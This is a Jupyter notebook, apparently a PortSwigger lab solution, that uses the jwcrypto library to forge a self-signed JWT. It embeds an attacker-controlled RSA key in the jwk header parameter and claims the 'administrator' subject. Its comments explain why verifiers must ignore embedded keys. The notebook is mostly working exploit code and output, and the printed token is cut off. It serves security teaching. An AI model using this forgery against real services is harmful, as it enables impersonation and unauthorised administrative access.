## Inject self-signed JWT via jwk header parameter.
This seems to be the least amount of work needed to implement this attack from the building blocks that jwcrypto provides.

See https://portswigger.net/web-security/jwt.

In [2]:
from jwcrypto import jwt, jwk
import uuid

In [3]:
# Key id (kid) for the key generated below. uuid1() is time-based, so the
# printed value differs on every run; the same kid is reused in the token
# header and inside the embedded jwk so that the two stay consistent.
kid = f"{uuid.uuid1()}"
kid

'31bf81b8-ca5c-11ed-9712-6045bd7ea403'

In [4]:
# RSA key pair under the tester's control. Only its public half is embedded in
# the token header; a verifier that accepts that embedded key as its trust
# anchor is the weakness this notebook demonstrates.
key_params = {"kty": "RSA", "size": 2048, "kid": kid}
key = jwk.JWK.generate(**key_params)

In [11]:
# JOSE header for the forged token. RFC 7515 §4.1.3 defines "jwk" as the
# public key that corresponds to the signing key, but it is attacker-supplied
# data: a verifier must resolve keys only from its own configured key set
# (e.g. kid looked up in a server-side JWKS) and ignore a key that arrives
# inside the very token it is asked to verify.
public_jwk = key.export_public(as_dict=True)
header = dict(kid=kid, alg="RS256", jwk=public_jwk)
header

{'kid': '31bf81b8-ca5c-11ed-9712-6045bd7ea403',
 'alg': 'RS256',
 'jwk': {'kty': 'RSA',
  'kid': '31bf81b8-ca5c-11ed-9712-6045bd7ea403',
  'n': '3WUO6sH2_ePoie2_QmY9cTVBTsT0oOINUY3HCV_JVhVoU6GaAX9FnzcrOe4sO1a5i1IYmhlysmIP158jZz2p0TfnEjQCjTIVk3-yvDdDrLd0j9PeMkC_QFyr36KCh3Jc8Z7tO2eo5tuxfUeVogjDzPZJbuNCYJcKlSPFISxU83CcS9HMBs-GfI8mcK3cFB6w-KdUCiAiRbXnea5NyZJssaZegjjmWEqjKIl-2lo3ZEszBkH46z8X0xKuK2N1gbONxZynspUXEjod1cENEqZTdOlJcpaDx3OTi11GiG-smzDWX6PYlezsHX4qCZsYzDPQY-wLabzK1kUdKwKzkXvEnw',
  'e': 'AQAB'}}

In [8]:
# Claim set for the forged token. exp is a fixed epoch timestamp (March 2023),
# so a verifier that enforces exp rejects this token once that instant has
# passed; the lab target is what decides whether iss/sub are honoured.
claims = dict(
    iss="portswigger",
    sub="administrator",
    exp=1679676620,
)

In [12]:
# Build the token and sign it with the generated private key; the matching
# public half is already carried in the header's jwk parameter, so the
# signature verifies against the key the token itself supplies.
token = jwt.JWT(claims=claims, header=header)
token.make_signed_token(key)

In [13]:
# Compact serialization (base64url header.payload.signature). The first
# segment contains the embedded jwk, which is why the output is so long.
compact = token.serialize()
compact

'eyJhbGciOiJSUzI1NiIsImp3ayI6eyJlIjoiQVFBQiIsImtpZCI6IjMxYmY4MWI4LWNhNWMtMTFlZC05NzEyLTYwNDViZDdlYTQwMyIsImt0eSI6IlJTQSIsIm4iOiIzV1VPNnNIMl9lUG9pZTJfUW1ZOWNUVkJUc1Qwb09JTlVZM0hDVl9KVmhWb1U2R2FBWDlGbnpjck9lNHNPMWE1aTFJWW1obHlzbUlQMTU4alp6MnAwVGZuRWpRQ2pUSVZrMy15dkRkRHJMZDBqOVBlTWtDX1FGeXIzNktDaDNKYzhaN3RPMmVvNXR1eGZVZVZvZ2pEelBaSmJ1TkNZSmNLbFNQRklTeFU4M0NjUzlITUJzLUdmSThtY0szY0ZCNnctS2RVQ2lBaVJiWG5lYTVOeVpKc3NhWmVnamptV0VxaktJbC0ybG8zWkVzekJrSDQ2ejhYMHhLdUsyTjFnYk9OeFp5bnNwVVhFam9kMWNFTkVxWlRkT2xKY3BhRHgzT1RpMTFHaUctc216RFdYNlBZbGV6c0hYNHFDWnNZekRQUVktd0xhYnpLMWtVZEt3S3prWHZFbncifSwia2lkIjoiMzFiZjgxYjgtY2E1Yy0xMWVkLTk3MTItNjA0NWJkN2VhNDAzIn0.eyJleHAiOjE2Nzk2NzY2MjAsImlzcyI6InBvcnRzd2lnZ2VyIiwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.KSV-RWP8IHHWYJFHHiuR87_QEzSxDUfNv3jIXLjHgnMHK4pqpL16A7nv-dwqIj-iIZzevyyFz3UcApFlfpWJbQjG7OzDaMOv7PaKa6Y61YaamJwMb94JIiGhN1LcKhhHcCwNH7FlM2bTJcxVE-zrxlINxpMlhBLyd0VfxzyHKLtHYX1_Fe_HfkMosvGh9rGifIBfQtQylrDMh0ilvxDAosz1brNYslcXBQGBVMFwgNaE6QgaHqx984eXNDNWPrli_dHu7eEc9663x1